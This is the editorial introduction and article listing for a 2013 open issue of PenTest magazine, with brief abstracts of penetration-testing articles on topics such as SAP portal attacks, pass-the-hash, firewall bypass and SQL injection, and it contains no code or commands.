PENTEST OPEN 08/2013 – BLOODY SCENARIOS

Dear PenTest Readers,

We are proudly presenting to you the October’s OPEN issue.

Long time has passed since we have prepared something THAT special for members without a subscription!
After long and profound research, we have created a beautiful (and bloody) OPEN issue.

Hacking SAP Enterprise Portal
by Dmitry Chastukhin
Business applications have been and will always be the cherished goal of cybercriminals’ attacks. Such actions can have many purposes: industrial espionage, the desire to cause financial or reputational losses, sale of critical information. In this article, I would like to tell in detail how a potential attacker can attack one of the most popular modules of the SAP ERP system: SAP Enterprise Portal, and how such attacks can be avoided.

Common Attack Patterns in Penetration Testing
by Sumit Agarwal
A penetration testing project for assessing overall security of an organization covers testing of various aspects and layers of its security infrastructure. The idea of a pentest is not just to check the existence of controls but to evaluate the sufficiency and appropriateness of these controls.

Automating POST-Method CSRF Attacks
by Justin Hutchens
Cross-Site Request Forgery is often compared to XSS (Cross-Site Scripting), but really…this isn’t accurate. XSS exploits a vulnerability on a target server to access, manipulate, and exploit data on the client-side.

Blackhat Recon With Wireshark
by Lee Alexander King
On unknown networks and black hat testing, Wireshark is a must-have tool to find critical information about your surroundings,
infrastructure and potential vulnerabilities. Find out more together with Lee Alexander King.

Bypassing new generation Firewalls with Meterpreter and SSH Tunnels
by Ignacio Sorribas
In this article we seen how in some cases the firewall detects
malicious code and is capable of blocking the connections,
but also demonstrated how easy it is to bypass this restriction.

Taking Over an Active Directory
by Gilad Ofir
As Pentesters and Security Specialists, we often come across a need to secure infrastructure. This need is caused by the fact that our systems are constantly at risk from either internal or external attacks. The attack, which is demonstrated in the article, presents a simple scenario where an attacker does a simple takeover of an active directory while using only backtrack and our knowledge, of course.

MS Internet Explorer Same ID Property Remote Code Execution Vulnerability
by Praveen Parihar
In this article you will learn about concepts behind Internet Explorer memory corruption, what kinds of bypass techniques are used to launch buffer overflows, heap based and stack overflow attacks and return oriented programming concepts to exploit remote code execution vulnerabilities.

Pass-The-Hash Attacks
by Christopher Ashby
Pass-The-Hash (PTH) is a post exploitation attack technique that is used to obtain user account hashes from either client workstations or domain servers and then use this information to elevate privileges and/or create new authenticated sessions. The technique is used after the attacker has gained access to your environment; special attention to the risk should be raised with regards to protecting yourself against malicious insiders or rouge employees.

From SQLi in Oracle to Remote Execution
by Jose Selvi
SQL Injection is one of the most common vulnerabilities you can find in webapps. In fact, it is the number 1 vulnerability on the famous OWASP Top 10. As you probably know, SQL Injection can be exploited in order to get all the information stored in a database, but that is not all we can do with this kind of vulnerability. Databases are complex systems and can be configured wrong or be outdated. In this article the author writes about one possible target scenario: a SQL Injection that allows us to execute SQL statements on an Oracle 11g database in order to exploit its vulnerabilities and achieve a complete system pwning.

How to Detect SQL Injection Vulnerabilities in SOAP
by Francesco Perna and Pietro Minniti
SQL Injections are a well known topic in web application security. So, why another article about that? Because not all the SQL injections are so obvious, and pentesters often look for them only inside the web application GET/POST requests. In this article, the author writes about a real world example, where the automated vulnerability scanner tools failed to detect the SQL injection vulnerability residing inside the SOAP web services code, invoked by an MDI Windows application. Particularly, he describes the vulnerability exploitation phases starting from the detection to the database data acquisition using the commonly available tools.